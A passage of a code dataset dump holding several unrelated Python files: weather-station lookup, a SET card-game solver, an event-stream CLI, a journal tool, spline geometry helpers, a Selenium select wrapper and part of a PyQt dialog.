Optional[Union[datetime, str]] = None,\n maximal_available_date: Optional[Union[datetime, str]] = None,\n) -> pd.DataFrame:\n \"\"\"\n Provides a list of weather station ids for the requested data\n\n :param latitude: Latitude of location to search for nearest\n weather station\n :param longitude: Longitude of location to search for nearest\n weather station\n :param minimal_available_date: Start date of timespan where measurements\n should be available\n :param maximal_available_date: End date of timespan where measurements\n should be available\n :param parameter: Observation measure\n :param time_resolution: Frequency/granularity of measurement interval\n :param period_type: Recent or historical files\n :param num_stations_nearby: Number of stations that should be nearby\n\n :return: DataFrames with valid stations in radius per\n requested location\n\n \"\"\"\n if num_stations_nearby <= 0:\n raise ValueError(\"'num_stations_nearby' has to be at least 1.\")\n\n parameter = parse_enumeration_from_template(parameter, Parameter)\n time_resolution = parse_enumeration_from_template(time_resolution, TimeResolution)\n period_type = parse_enumeration_from_template(period_type, PeriodType)\n\n if not check_parameters(parameter, time_resolution, period_type):\n raise InvalidParameterCombination(\n f\"The combination of {parameter.value}, {time_resolution.value}, \"\n f\"{period_type.value} is invalid.\"\n )\n\n minimal_available_date = (\n minimal_available_date\n if not minimal_available_date or isinstance(minimal_available_date, datetime)\n else parse_datetime(minimal_available_date)\n )\n maximal_available_date = (\n maximal_available_date\n if not minimal_available_date or isinstance(maximal_available_date, datetime)\n else parse_datetime(maximal_available_date)\n )\n\n if minimal_available_date and maximal_available_date:\n if minimal_available_date > maximal_available_date:\n raise ValueError(\n \"'minimal_available_date' has to be before \" \"'maximal_available_date'\"\n )\n\n coords = Coordinates(np.array(latitude), np.array(longitude))\n\n metadata = metadata_for_climate_observations(\n parameter, time_resolution, period_type\n )\n\n # Filter only for stations that have a file\n metadata = metadata[metadata[DWDMetaColumns.HAS_FILE.value].values]\n\n if minimal_available_date:\n metadata = metadata[\n metadata[DWDMetaColumns.FROM_DATE.value] <= minimal_available_date\n ]\n\n if maximal_available_date:\n metadata = metadata[\n metadata[DWDMetaColumns.TO_DATE.value] >= maximal_available_date\n ]\n\n metadata = metadata.reset_index(drop=True)\n\n distances, indices_nearest_neighbours = _derive_nearest_neighbours(\n metadata.LAT.values, metadata.LON.values, coords, num_stations_nearby\n )\n\n distances = pd.Series(distances)\n indices_nearest_neighbours = pd.Series(indices_nearest_neighbours)\n\n # If num_stations_nearby is higher then the actual amount of stations\n # further indices and distances are added which have to be filtered out\n distances = distances[: min(metadata.shape[0], num_stations_nearby)]\n indices_nearest_neighbours = indices_nearest_neighbours[\n : min(metadata.shape[0], num_stations_nearby)\n ]\n\n distances_km = np.array(distances * KM_EARTH_RADIUS)\n\n metadata_location = metadata.iloc[indices_nearest_neighbours, :].reset_index(\n drop=True\n )\n\n metadata_location[DWDMetaColumns.DISTANCE_TO_LOCATION.value] = distances_km\n\n if metadata_location.empty:\n logger.warning(\n f\"No weather stations were found for coordinate \"\n f\"{latitude}°N and {longitude}°E \"\n )\n\n return metadata_location\n\n\ndef get_nearby_stations_by_distance(\n latitude: float,\n longitude: float,\n max_distance_in_km: float,\n parameter: Union[Parameter, str],\n time_resolution: Union[TimeResolution, str],\n period_type: Union[PeriodType, str],\n minimal_available_date: Optional[Union[datetime, str]] = None,\n maximal_available_date: Optional[Union[datetime, str]] = None,\n) -> pd.DataFrame:\n \"\"\"\n Provides a list of weather station ids for the requested data\n\n :param latitude: Latitude of location to search for nearest\n weather station\n :param longitude: Longitude of location to search for nearest\n weather station\n :param minimal_available_date: Start date of timespan where measurements\n should be available\n :param maximal_available_date: End date of timespan where measurements\n should be available\n :param parameter: Observation measure\n :param time_resolution: Frequency/granularity of measurement interval\n :param period_type: Recent or historical files\n :param max_distance_in_km: Alternative filtering criteria, maximum\n distance to location in km\n\n :return: DataFrames with valid stations in radius per\n requested location\n \"\"\"\n # Theoretically a distance of 0 km is possible\n if max_distance_in_km < 0:\n raise ValueError(\"'max_distance_in_km' has to be at least 0.0.\")\n\n metadata = metadata_for_climate_observations(\n parameter, time_resolution, period_type\n )\n\n all_nearby_stations = get_nearby_stations_by_number(\n latitude,\n longitude,\n metadata.shape[0],\n parameter,\n time_resolution,\n period_type,\n minimal_available_date,\n maximal_available_date,\n )\n\n nearby_stations_in_distance = all_nearby_stations[\n all_nearby_stations[DWDMetaColumns.DISTANCE_TO_LOCATION.value]\n <= max_distance_in_km\n ]\n\n return nearby_stations_in_distance.reset_index(drop=True)\n\n\ndef _derive_nearest_neighbours(\n latitudes_stations: np.array,\n longitudes_stations: np.array,\n coordinates: Coordinates,\n num_stations_nearby: int = 1,\n) -> Tuple[Union[float, np.ndarray], np.ndarray]:\n \"\"\"\n A function that uses a k-d tree algorithm to obtain the nearest\n neighbours to coordinate pairs\n\n Args:\n latitudes_stations (np.array): latitude values of stations being compared to\n the coordinates\n longitudes_stations (np.array): longitude values of stations being compared to\n the coordinates\n coordinates (Coordinates): the coordinates for which the nearest neighbour\n is searched\n num_stations_nearby: Number of stations that should be nearby\n\n Returns:\n Tuple of distances and ranks of nearest to most distant stations\n \"\"\"\n points = np.c_[np.radians(latitudes_stations), np.radians(longitudes_stations)]\n distance_tree = cKDTree(points)\n return distance_tree.query(\n coordinates.get_coordinates_in_radians(), k=num_stations_nearby\n )\n","sub_path":"wetterdienst/dwd/observations/stations.py","file_name":"stations.py","file_ext":"py","file_size_in_byte":10122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"188991248","text":"from sets_types import Card, Color, Shape, Filling, Count, CardSet\nfrom typing import List, Tuple, Union\nfrom itertools import chain, combinations\n \n\nclass Table:\n def __init__(self, cards: List[List[Card]]):\n self.cards = cards\n \n def get_sets(self) -> List[CardSet]:\n cards = chain.from_iterable(self.cards)\n combs = combinations(cards, 3)\n sets = []\n for comb in combs:\n try:\n sets.append(CardSet(*comb))\n except ValueError:\n pass\n return sets\n\n def print(self, highlight: Union[List[Card], CardSet]):\n out = []\n for row in self.cards:\n row_p = []\n for card in row:\n card_p = card.print(card in highlight)\n if not row_p:\n row_p = card_p\n continue\n row_p = list(map(lambda x: ''.join(x), zip(row_p, card_p)))\n out.append('\\n'.join(row_p))\n print('\\n'.join(out)) \n\n\ndef detect_table(data: List[List[str]]) -> Table:\n table = []\n for x in data:\n row = []\n for y in x:\n row.append(Card.from_string(y))\n table.append(row)\n return Table(table)\n \n\ndef main(data: List[List[str]]) -> None:\n table = detect_table(data)\n sets = table.get_sets()\n print(f\"Number of sets: {len(sets)}\")\n \n for i, x in enumerate(sets):\n print(f'Set {i+1}:')\n table.print(highlight=x)\n\n\nif __name__ == '__main__':\n print('Starting sets checker')\n data = [\n ['gde3','goe3','pwe1','roe1','pof2'],\n ['pde3','rdf1','roe3','gdf1','poe1'],\n ['pod2','gwd3','gwf2','rwf3','rwe2'],\n ]\n main(data)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"509431736","text":"import re\nimport json\n\nfrom okdata.sdk.event.post_event import PostEvent\nfrom okdata.sdk.elasticsearch.queries import ElasticsearchQueries\nfrom okdata.sdk.event.event_stream_client import EventStreamClient\n\nfrom okdata.cli.command import BaseCommand, BASE_COMMAND_OPTIONS\nfrom okdata.cli.io import read_json\nfrom okdata.cli.output import create_output\n\n\nclass EventsCommand(BaseCommand):\n __doc__ = f\"\"\"Oslo :: Events\n\nUsage:\n okdata events describe-stream [options]\n okdata events create-stream [--skip-raw] [options]\n okdata events delete-stream [options]\n okdata events enable-subscription [options]\n okdata events disable-subscription [options]\n okdata events enable-sink --sink-type= [options]\n okdata events disable-sink --sink-type= [options]\n okdata events put [(--file= | --data=) options]\n okdata events stat [options]\n\nExamples:\n okdata events describe-stream ds:my-dataset-id/1\n okdata events describe-stream my-dataset-id/1\n okdata events describe-stream my-dataset-id\n okdata events create-stream ds:my-dataset-id/1\n okdata events enable-sink ds:my-dataset-id/1 --sink-type=s3\n okdata events disable-sink ds:my-dataset-id/1 --sink-type=elasticsearch\n echo '{{\"hello\": \"world\"}}' | okdata events put ds:my-dataset-id/1\n echo '[{{\"hello\": \"world\"}}, {{\"world\": \"hello\"}}]' | okdata events put ds:my-dataset-id/1\n cat /tmp/event.json | okdata events put ds:my-dataset-id/1\n okdata events put ds:my-dataset-id/1 --data='{{\"hello\": \"world\"}}'\n okdata events put ds:my-dataset-id/1 --file=/tmp/event.json\n okdata events stat ds:my-dataset-id\n okdata events stat ds:my-dataset-id --format=json | jq \".last_hour.events\"\n\nOptions:{BASE_COMMAND_OPTIONS}\n \"\"\"\n\n def __init__(self):\n super().__init__()\n env = self.opt(\"env\")\n\n self.sdk = EventStreamClient(env=env)\n self.post_event_sdk = PostEvent(env=env)\n self.esq_sdk = ElasticsearchQueries(env=env)\n\n self.handler = self.default\n\n def default(self):\n self.log.info(\"EventsCommand.handle()\")\n\n if self.cmd(\"describe-stream\"):\n self.describe_stream()\n elif self.cmd(\"create-stream\"):\n self.create_stream()\n elif self.cmd(\"delete-stream\"):\n self.delete_stream()\n elif self.cmd(\"enable-subscription\"):\n self.enable_subscription()\n elif self.cmd(\"disable-subscription\"):\n self.disable_subscription()\n elif self.cmd(\"enable-sink\"):\n self.enable_sink()\n elif self.cmd(\"disable-sink\"):\n self.disable_sink()\n elif self.cmd(\"put\"):\n self.put_event()\n elif self.cmd(\"stat\"):\n self.event_stat()\n else:\n self.help()\n\n def describe_stream(self):\n dataset_id, version = self._resolve_dataset_uri()\n\n event_stream = self.sdk.get_event_stream_info(dataset_id, version)\n subscribable = self.sdk.get_subscribable(dataset_id, version)\n sinks = self.sdk.get_sinks(dataset_id, version)\n\n if self.opt(\"format\") == \"json\":\n out = {}\n out[\"stream\"] = event_stream\n out[\"subscribable\"] = subscribable\n out[\"sinks\"] = sinks\n self.print(\"\", out)\n return\n\n out = create_output(self.opt(\"format\"), \"events_stream_config.json\")\n out.output_singular_object = True\n out.add_row(event_stream)\n self.print(f\"Event stream: {dataset_id}/{version}\", out)\n\n out = create_output(self.opt(\"format\"), \"events_subscribable_config.json\")\n out.output_singular_object = True\n out.add_row(subscribable)\n self.print(\"\\n\\nSubscribable for event stream:\", out)\n\n out = create_output(self.opt(\"format\"), \"events_sink_config.json\")\n out.add_rows(sinks)\n self.print(\"\\n\\nSinks for event stream:\", out)\n\n def create_stream(self):\n dataset_id, version = self._resolve_dataset_uri()\n create_raw = not self.opt(\"skip-raw\")\n event_stream = self.sdk.create_event_stream(\n dataset_id, version, create_raw=create_raw\n )\n out = create_output(self.opt(\"format\"), \"events_stream_config.json\")\n out.output_singular_object = True\n out.add_row(event_stream)\n self.print(f\"Creating event stream for {dataset_id}/{version}\", out)\n\n def delete_stream(self):\n dataset_id, version = self._resolve_dataset_uri()\n event_stream = self.sdk.delete_event_stream(dataset_id, version)\n out = create_output(self.opt(\"format\"), \"events_stream_config.json\")\n out.output_singular_object = True\n out.add_row(event_stream)\n self.print(f\"Deleting event stream for {dataset_id}/{version}\", out)\n\n def enable_subscription(self):\n dataset_id, version = self._resolve_dataset_uri()\n subscribable = self.sdk.enable_subscription(dataset_id, version)\n out = create_output(self.opt(\"format\"), \"events_subscribable_config.json\")\n out.output_singular_object = True\n out.add_row(subscribable)\n self.print(\n f\"Enabling subscription for event stream {dataset_id}/{version}\", out\n )\n\n def disable_subscription(self):\n dataset_id, version = self._resolve_dataset_uri()\n subscribable = self.sdk.disable_subscription(dataset_id, version)\n out = create_output(self.opt(\"format\"), \"events_subscribable_config.json\")\n out.output_singular_object = True\n out.add_row(subscribable)\n self.print(\n f\"Disabling subscription for event stream {dataset_id}/{version}\", out\n )\n\n def enable_sink(self):\n dataset_id, version = self._resolve_dataset_uri()\n sink_type = self.opt(\"sink-type\")\n sink = self.sdk.enable_sink(dataset_id, version, sink_type=sink_type)\n out = create_output(self.opt(\"format\"), \"events_sink_config.json\")\n out.output_singular_object = True\n out.add_row(sink)\n self.print(f\"Enabling {sink_type} sink for {dataset_id}/{version}\", out)\n\n def disable_sink(self):\n dataset_id, version = self._resolve_dataset_uri()\n sink_type = self.opt(\"sink-type\")\n response = self.sdk.disable_sink(dataset_id, version, sink_type=sink_type)\n if self.opt(\"format\") == \"json\":\n self.print(\"\", response)\n return\n self.print(response[\"message\"])\n\n def put_event(self):\n dataset_id, version = self._resolve_dataset_uri()\n out = create_output(self.opt(\"format\"), \"events_put_event_config.json\")\n out.output_singular_object = True\n if self.opt(\"data\") is not None:\n payload = json.loads(self.opt(\"data\"))\n else:\n payload = read_json(self.opt(\"file\"))\n self.log.info(f\"Putting event with payload: {payload}\")\n\n self.post_event_sdk.post_event(payload, dataset_id, version)\n data = {\n \"stream\": dataset_id,\n \"version\": version,\n \"source\": self.opt(\"file\") or \"stdin\",\n \"status\": \"Commited\",\n }\n out.add_row(data)\n self.print(\"Put event status\", out)\n\n def event_stat(self):\n dataset_id, version = self._resolve_dataset_uri()\n out = create_output(self.opt(\"format\"), \"events_stat_config.json\")\n\n data = self.esq_sdk.event_stat(dataset_id)\n if self.opt(\"format\") == \"json\":\n self.print(\"\", data)\n else:\n hour = data[\"last_hour\"]\n hour[\"timespan\"] = \"Last hour\"\n day = data[\"last_day\"]\n day[\"timespan\"] = \"Last day\"\n week = data[\"last_week\"]\n week[\"timespan\"] = \"Last week\"\n outdata = [hour, day, week]\n out.add_rows(outdata)\n self.print(f\"Events for {dataset_id}\", out)\n\n def _resolve_dataset_uri(self):\n dataset_uri = self.arg(\"dataset-uri\")\n uri_pattern = r\"\"\"\n ^ # beginning of string\n (?:ds:)? # match optional \"ds:\" prefix (non-capturing group)\n ([a-zA-Z0-9\\-]+) # match and capture dataset id; one or more characters in range a-z/A-Z/0-9, and \"-\"\n (?:\\/ # match optional dataset version (non-capturing group, exclude leading \"/\")\n ([1-9]|[1-9][0-9]+) # match and capture digits > 1 (if present)\n )?\n $ # end of string\n \"\"\"\n match = re.match(uri_pattern, dataset_uri, re.VERBOSE)\n\n if not match:\n raise ValueError(\n 'Invalid dataset URI, expects pattern \"[ds:][/]\"'\n )\n\n [dataset_id, version] = match.groups()\n\n version = version or \"1\"\n\n return dataset_id, version\n","sub_path":"okdata/cli/commands/events.py","file_name":"events.py","file_ext":"py","file_size_in_byte":8962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"122183449","text":"#!/usr/bin/env python3\n# encoding: utf-8\n\nimport os\nfrom sys import argv\nimport logging\nfrom datetime import datetime\nfrom pathlib import Path\nfrom typing import List\n\n\ndef prepend_filename_to_log(filename: Path or str, log_file: Path):\n if not log_file.exists():\n log_file.touch()\n with open(log_file, \"r+\") as f:\n lines = f.readlines()\n lines.insert(0, str(filename) + \"\\n\")\n f.writelines(lines)\n f.close()\n\n\ndef get_path_from_first_line_of_log(log_path) -> Path:\n if not log_path.exists():\n raise ValueError(\"log path '\" + str(log_path) + \"' doesn't exist\")\n with open(log_path, \"r\") as f:\n first_entry_string = f.read().splitlines()[0]\n return Path(first_entry_string)\n\n\ndef is_entry_path_existing(entry_path: Path or str, journal_dir: Path) -> bool:\n full_entry_path = Path(journal_dir / entry_path)\n return full_entry_path.exists()\n\n\ndef get_title_taken_message(title):\n return \"Sorry! The title \\\"\" + title + \"\\\" is already taken. :c\"\n\n\ndef get_vim_launch_command(journal_file):\n return 'vim + \"' + str(journal_file) + '\"'\n\n\ndef get_unique_title(journal_dir):\n title = input(\"Please provide a title or just say \\\"no\\\": \")\n if title == \"no\":\n return \"untitled\"\n new_entry = journal_dir / (title + \".txt\")\n if new_entry.exists():\n print(get_title_taken_message(title))\n return get_unique_title(journal_dir)\n if title == \"\":\n return get_unique_title(journal_dir)\n else:\n return title\n\n\ndef get_entries(journal_dir: Path, recursive: bool = False) -> List[Path]:\n if recursive:\n all_files: List[Path] = journal_dir.rglob(\"*\")\n hidden_files: List[Path] = journal_dir.rglob(\".*\")\n else:\n all_files: List[Path] = journal_dir.glob(\"*\")\n hidden_files: List[Path] = journal_dir.glob(\".*\")\n return [file for file in all_files if not any(\n file == hfile for hfile in hidden_files) and not file.is_dir()]\n\n\ndef get_entries_with_phrase_in_body(\n journal_dir: Path,\n phrase: str,\n recursive: bool = False) -> list:\n print(\"Printing journal files containing the phrase \\\"\" + phrase + \"\\\"\")\n if recursive:\n journal_entries = get_entries(journal_dir, recursive=True)\n else:\n journal_entries = get_entries(journal_dir)\n return [entry for entry in journal_entries if entry.read_text().find(phrase) != -1]\n\n\ndef get_list_of_entries_with_name_containing(\n journal_dir: Path,\n search_str: str,\n search_archives=False):\n if search_archives:\n matched_paths = journal_dir.rglob(\"*\" + search_str + \"*\")\n else:\n matched_paths = journal_dir.glob(\"*\" + search_str + \"*\")\n return [path for path in matched_paths if not path.is_dir()]\n\n\ndef main(\n journal_dir=Path.home() /\n \"Documents/journal\",\n log_file=Path.home() /\n \".jlv\"):\n\n no_flags_given = True\n title = \"untitled\"\n\n for index, arg in enumerate(argv):\n if arg[0:6] == \"--log=\":\n log_level = arg[6:]\n level_num = getattr(logging, log_level.upper())\n if not isinstance(level_num, int):\n raise ValueError('Invalid log level: %s' % log_level)\n logging.basicConfig(\n format='%(levelname)s:%(message)s',\n level=level_num)\n logging.info(\"custom logging level given: \" + log_level)\n if log_level.upper() == \"INFO\":\n journal_dir = Path(\"/tmp\")\n log_file = Path(\"/tmp/.jlv\")\n logging.info(\"argv = \" + str(argv))\n no_flags_given = False\n if arg == \"-t\":\n title = argv[index + 1]\n no_flags_given = False\n if arg == \"-p\":\n entry_location = get_path_from_first_line_of_log(log_file)\n entry_path = journal_dir / entry_location\n command = get_vim_launch_command(entry_path)\n os.system(command)\n exit(0)\n if arg == \"-s\":\n logging.info(\"index = \" + str(index) + \"\\nargv = \" + str(argv))\n matched_entries = get_entries_with_phrase_in_body(\n journal_dir, argv[index + 1])\n print(\"\\n\".join(str(entry) for entry in matched_entries))\n exit(0)\n if arg == \"-l\":\n entries = get_entries(journal_dir)\n print(\"\\n\".join(str(entry) for entry in entries))\n exit(0)\n if arg == \"-o\":\n search_string = argv[index + 1]\n possible_entry_paths = get_list_of_entries_with_name_containing(\n journal_dir, search_string)\n for entry_path in possible_entry_paths:\n response = \"\"\n while response != \"y\" and response != \"n\":\n print(\"Open \" + str(entry_path) + \"? (y/n)\")\n response = input()\n if response == \"y\":\n command = get_vim_launch_command(entry_path)\n os.system(command)\n break\n exit(0)\n\n logging.info(\"jlv starting...\")\n\n d = datetime.now().isoformat(sep='_', timespec='seconds')\n\n if no_flags_given and len(argv) > 1:\n title = argv[1]\n\n logging.info(\"title = \" + title)\n logging.info(\"journal directory: \" + str(journal_dir))\n\n if not journal_dir.is_dir():\n journal_dir.mkdir()\n logging.info(str(journal_dir) + \" directory was created\")\n else:\n logging.info(str(journal_dir) + \" directory was found\")\n\n if title != \"untitled\":\n # can't have forward slashes in the filename\n journal_file = journal_dir / (title.replace(\"/\", \"-\") + \".txt\")\n else:\n journal_file = journal_dir / (\"untitled_\" + d)\n\n if journal_file.is_file():\n print(get_title_taken_message(title))\n title = get_unique_title(journal_dir)\n if title != \"untitled\":\n journal_file = journal_dir / (title + \".txt\")\n else:\n journal_file = journal_dir / (\"untitled_\" + d)\n\n logging.info(\"creating new journal file: \" + str(journal_file))\n journal_file.touch()\n with open(journal_file, \"w+\") as f:\n f.write(title + \"\\n\\ncreated \" + d + \"\\n\\n\\n\")\n\n command = get_vim_launch_command(journal_file)\n os.system(command)\n\n if title == \"untitled\":\n title = get_unique_title(journal_dir)\n if title != \"untitled\":\n new_journal_file = journal_dir / (title + \".txt\")\n journal_file.rename(new_journal_file)\n journal_file = new_journal_file\n with open(journal_file) as f:\n lines = f.readlines()\n lines[0] = title + \"\\n\"\n with open(journal_file, \"w\") as f:\n f.writelines(lines)\n\n prepend_filename_to_log(journal_file.relative_to(journal_dir), log_file)\n\n\n# TODO add -r (recent) functionality for printing out last 10 journal entries in format \"title.txt, date-stamp\"\n# TODO add -l (list) functionality for listing out all journal entries in\n# format \"title.txt, date-stamp\"\n\nif __name__ == '__main__':\n main()\n","sub_path":"build/lib/jlv/jlv.py","file_name":"jlv.py","file_ext":"py","file_size_in_byte":7081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"514298994","text":"# -*- coding: utf-8 -*-\n\nfrom visigoth import Diagram\nfrom visigoth.common import Button, ButtonGrid\n\nd = Diagram()\n\nbg = ButtonGrid()\nbg.addButton(0,1,Button(\"North Button\"))\nbg.addButton(1,0,Button(\"West Button\"))\nbg.addButton(1,1,Button(\"Centre Button\"),initially_selected=True)\nbg.addButton(1,2,Button(\"East Button\"))\nbg.addButton(2,1,Button(\"South Button\"))\n\nd.add(bg)\nhtml = d.draw(format=\"html\")\n\nf = open(\"example.html\", \"w\")\nf.write(html)\nf.close()\n","sub_path":"docs/src/common/buttongrid/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"23955548","text":"import random\n\nfrom src.python.framework.elements.base_element import BaseElement\n\n\nclass Select(BaseElement):\n\tdef __init__(self, locator=None, element=None):\n\t\tsuper().__init__(locator, element)\n\t\tself.current_option = None\n\n\tdef select_option(self, option):\n\t\titems_list = self.get_options()\n\t\tfor item in items_list:\n\t\t\tif item.get_attribute(\"label\") == option:\n\t\t\t\tself.current_option = option\n\t\t\t\titem.click()\n\t\t\t\tbreak\n\n\tdef get_options(self):\n\t\treturn self().find_elements_by_tag_name('option')\n\n\tdef select_random_option(self):\n\t\twhile True:\n\t\t\trand_val = random.choice(self.get_options()).get_attribute(\"label\")\n\t\t\tif 'Select' not in rand_val:\n\t\t\t\tbreak\n\t\tself.select_option(rand_val)\n","sub_path":"src/python/framework/elements/select.py","file_name":"select.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"399183889","text":"# -*- coding: utf-8 -*-\nimport numpy as np\n\nfrom datatypes import SplineCurve\nfrom datatypes import SplineSurface\nfrom datatypes import SplineVolume\nfrom datatypes import NurbsCurve\nfrom datatypes import NurbsSurface\nfrom datatypes import NurbsVolume\n\n# ...\ndef make_line(origin=(0.,0.), end=(1.,0.)):\n knots = [0., 0., 1., 1.]\n degree = 1\n n = len(knots) - degree - 1\n\n P = np.zeros((n, 2))\n P[:, 0] = [origin[0], end[0]]\n P[:, 1] = [origin[1], end[1]]\n\n return SplineCurve(knots=knots, degree=degree, points=P)\n\ndef make_arc(center=(0.,0.), radius=1., angle=90.):\n if angle == 90.:\n knots = [0., 0., 0., 1., 1., 1.]\n degree = 2\n n = len(knots) - degree - 1\n\n P = np.zeros((n, 2))\n P[:, 0] = [1., 1., 0.]\n P[:, 1] = [0., 1., 1.]\n\n # weights\n s2 = 1./np.sqrt(2)\n W = np.zeros(n)\n W[:] = [1., s2, 1.]\n\n elif angle == 120.:\n knots = [0., 0., 0., 1., 1., 1.]\n degree = 2\n n = len(knots) - degree - 1\n\n P = np.zeros((n, 2))\n a = np.cos(np.pi/6.)\n P[:, 0] = [ a, 0., -a]\n P[:, 1] = [.5, 2., .5]\n\n # weights\n W = np.zeros(n)\n W[:] = [1., 1./2., 1.]\n\n elif angle == 180.:\n knots = [0., 0., 0., 0., 1., 1., 1., 1.]\n degree = 3\n n = len(knots) - degree - 1\n\n P = np.zeros((n, 2))\n P[:, 0] = [1., 1., -1., -1.]\n P[:, 1] = [0., 2., 2., 0.]\n\n # weights\n W = np.zeros(n)\n W[:] = [1., 1./3., 1./3., 1.]\n\n else:\n raise NotImplementedError('TODO, given {}'.format(angle))\n\n P *= radius\n P[:,0] += center[0]\n P[:,1] += center[1]\n\n return NurbsCurve(knots=knots, degree=degree, points=P, weights=W)\n\ndef make_square(origin=(0,0), length=1.):\n Tu = [0., 0., 1., 1.]\n Tv = [0., 0., 1., 1.]\n pu = 1\n pv = 1\n nu = len(Tu) - pu - 1\n nv = len(Tv) - pv - 1\n gridu = np.unique(Tu)\n gridv = np.unique(Tv)\n\n origin = np.asarray(origin)\n\n P = np.asarray([[[0.,0.],[0.,1.]],[[1.,0.],[1.,1.]]])\n for i in range(0, 2):\n for j in range(0, 2):\n P[i,j,:] = origin + P[i,j,:]*length\n\n return SplineSurface(knots=(Tu, Tv), degree=(pu, pv), points=P)\n\ndef make_circle(center=(0.,0.), radius=1.):\n Tu = [0., 0., 0., 1, 1., 1.]\n Tv = [0., 0., 0., 1, 1., 1.]\n pu = 2\n pv = 2\n nu = len(Tu) - pu - 1\n nv = len(Tv) - pv - 1\n gridu = np.unique(Tu)\n gridv = np.unique(Tv)\n\n\n s = 1./np.sqrt(2)\n P = np.zeros((nu,nv,2))\n P[0,0,:] = np.asarray([-s , -s ])\n P[1,0,:] = np.asarray([-2*s , 0. ])\n P[2,0,:] = np.asarray([-s , s ])\n P[0,1,:] = np.asarray([0. , -2*s ])\n P[1,1,:] = np.asarray([0. , 0.0 ])\n P[2,1,:] = np.asarray([0. , 2*s ])\n P[0,2,:] = np.asarray([s , -s ])\n P[1,2,:] = np.asarray([2*s , 0. ])\n P[2,2,:] = np.asarray([s , s ])\n\n P *= radius\n P[:,:,0] += center[0]\n P[:,:,1] += center[1]\n\n W = np.zeros((3,3))\n W[0,0] = 1.\n W[1,0] = s\n W[2,0] = 1.\n W[0,1] = s\n W[1,1] = 1.\n W[2,1] = s\n W[0,2] = 1.\n W[1,2] = s\n W[2,2] = 1.\n\n return NurbsSurface(knots=(Tu, Tv), degree=(pu, pv), points=P, weights=W)\n# ...\n\ndef make_half_annulus_cubic(center=(0.,0.), rmax=1., rmin=0.5):\n Tu = [0., 0., 0., 0., 1., 1., 1., 1.]\n Tv = [0., 0., 1., 1.]\n\n pu = 3\n pv = 1\n nu = len(Tu) - pu - 1\n nv = len(Tv) - pv - 1\n gridu = np.unique(Tu)\n gridv = np.unique(Tv)\n\n # ctrl points for radius = 1\n x = np.asarray([1., 1., -1., -1.])\n y = np.asarray([0., 2., 2., 0.])\n\n P = np.zeros((nu,nv,2))\n P[:, 0, 0] = rmax * x\n P[:, 0, 1] = rmax * y\n\n P[:, 1, 0] = rmin * x\n P[:, 1, 1] = rmin * y\n\n P[:,:,0] += center[0]\n P[:,:,1] += center[1]\n\n # weights\n W = np.zeros((nu,nv))\n W[:,0] = [1., 1./3., 1./3., 1.]\n W[:,1] = [1., 1./3., 1./3., 1.]\n\n return NurbsSurface(knots=(Tu, Tv), degree=(pu, pv), points=P, weights=W)\n\ndef make_L_shape_C1(center=None):\n Tu = [0., 0., 0., 0.5, 1., 1., 1.]\n Tv = [0., 0., 0., 1., 1., 1.]\n\n pu = 2\n pv = 2\n nu = len(Tu) - pu - 1\n nv = len(Tv) - pv - 1\n gridu = np.unique(Tu)\n gridv = np.unique(Tv)\n\n # ctrl points\n P = np.zeros((nu,nv,2))\n P[:,:,0] = np.asarray([[-1., -0.5, 0.], [-1., -0.707106781186548, 0.], [-1., -0.292893218813452, 0.], [1., 1., 1.]])\n P[:,:,1] = np.asarray([[-1., -1., -1.], [ 1., 0.292893218813452, 0.], [ 1., 0.707106781186548, 0.], [1., .5, 0.]])\n\n if not( center is None ):\n P[:,:,0] += center[0]\n P[:,:,1] += center[1]\n\n return SplineSurface(knots=(Tu, Tv), degree=(pu, pv), points=P)\n","sub_path":"cad/gallery.py","file_name":"gallery.py","file_ext":"py","file_size_in_byte":4719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"239755929","text":"from PyQt5.QtWidgets import QLineEdit, QDialog, QTreeWidget, QRadioButton, QMessageBox, QTreeWidgetItem, QPushButton, QTabWidget, QHeaderView\nfrom PyQt5.QtGui import QIcon, QColor, QBrush, QFont\nfrom PyQt5.QtCore import Qt\nfrom PyQt5 import uic\nimport configparser\nfrom time import time\n\nfrom pulse.preprocessing.fluid import Fluid\nfrom pulse.default_libraries import default_fluid_library\nfrom data.user_input.project.printMessageInput import PrintMessageInput\n\nwindow_title1 = \"ERROR MESSAGE\"\nwindow_title2 = \"WARNING MESSAGE\"\n\n\ndef getColorRGB(color):\n temp = color[1:-1]\n tokens = temp.split(',')\n return list(map(int, tokens))\n\nclass FluidInput(QDialog):\n def __init__(self, project, opv, *args, **kwargs):\n super().__init__(*args, **kwargs)\n uic.loadUi('data/user_input/ui/Model/Setup/Acoustic/fluidlnput.ui', self)\n \n icons_path = 'data\\\\icons\\\\'\n self.icon = QIcon(icons_path + 'pulse.png')\n self.setWindowIcon(self.icon)\n\n self.setWindowFlags(Qt.WindowStaysOnTopHint)\n self.setWindowModality(Qt.WindowModal)\n\n self.opv = opv\n self.opv.setInputObject(self)\n self.lines_ids = opv.getListPickedEntities()\n\n self.project = project\n self.preprocessor = project.preprocessor\n self.before_run = self.preprocessor.get_model_checks()\n\n self.fluid_path = project.get_fluid_list_path()\n\n self.dict_tag_to_entity = self.project.preprocessor.dict_tag_to_entity\n self.clicked_item = None\n self.fluid = None\n self.flagAll = False\n self.flagSelection = False\n\n self.adding = False\n self.editing = False\n self.temp_fluid_color = \"\"\n\n self.treeWidget_fluids = self.findChild(QTreeWidget, 'treeWidget_fluids')\n header = self.treeWidget_fluids.headerItem()\n \n fnt = QFont()\n fnt.setPointSize(11)\n fnt.setBold(True)\n # fnt.setItalic(True)\n fnt.setFamily(\"Arial\")\n\n for col_index, width in enumerate([140, 50, 80, 170, 180, 172]):\n self.treeWidget_fluids.setColumnWidth(col_index, width)\n header.setFont(col_index, fnt)\n # header.setBackground(col_index, QBrush(QColor(200, 200, 200)))\n # header.setForeground(col_index, QBrush(QColor(200, 200, 200)))\n 